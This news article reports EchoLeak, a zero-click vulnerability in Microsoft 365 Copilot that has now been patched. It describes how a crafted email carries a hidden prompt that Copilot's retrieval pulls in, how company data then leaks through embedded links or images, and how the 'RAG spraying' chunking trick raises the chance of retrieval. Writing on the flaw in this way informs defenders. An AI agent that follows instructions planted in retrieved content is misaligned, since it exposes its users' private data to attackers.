Cybersecurity researchers have uncovered a critical zero-click vulnerability in the Microsoft 365 Copilot AI agent, dubbed EchoLeak, which enables attackers to steal sensitive data via email without any user interaction.

This vulnerability, classified as critical with a CVE identifier of CVE-2025-32711 and a CVSS score of 9.3, was identified by Aim Labs and reported to Microsoft, which implemented a server-side patch in May 2025.

If exploited, EchoLeak could expose a wealth of sensitive internal information, including emails, spreadsheets, and chats, raising significant concerns about the security of AI systems in workplace applications.

As AI integration into business systems grows, researchers stress the need for evolving security strategies to address the new challenges posed by these technologies.

Aim Labs has warned that similar vulnerabilities may exist in other RAG-based AI systems beyond Microsoft Copilot, highlighting a broader risk landscape.

The attack method involves crafting a malicious email with a prompt designed to mimic human communication, which can trick the AI into accessing and sharing privileged company data.

M365 Copilot operates as a RAG-based chatbot, collecting information from company environments, which can inadvertently lead to the exposure of private data.

This AI tool integrates across various Office applications, using internal data to assist users, but its design flaws create vulnerabilities that can be exploited.

The AI may inadvertently leak internal data through links or images embedded in the email, with requests being automatically sent by the browser.

Researchers have also noted the potential for 'RAG spraying,' where attackers send lengthy emails segmented into smaller parts to increase the likelihood of them being processed by Copilot.

Microsoft's stock has shown resilience, reflecting a year-to-date increase of 12.9%, despite the recent security concerns surrounding its AI technologies.

Experts suggest that addressing such vulnerabilities may require a fundamental rethinking of AI agent design to ensure better security in the future.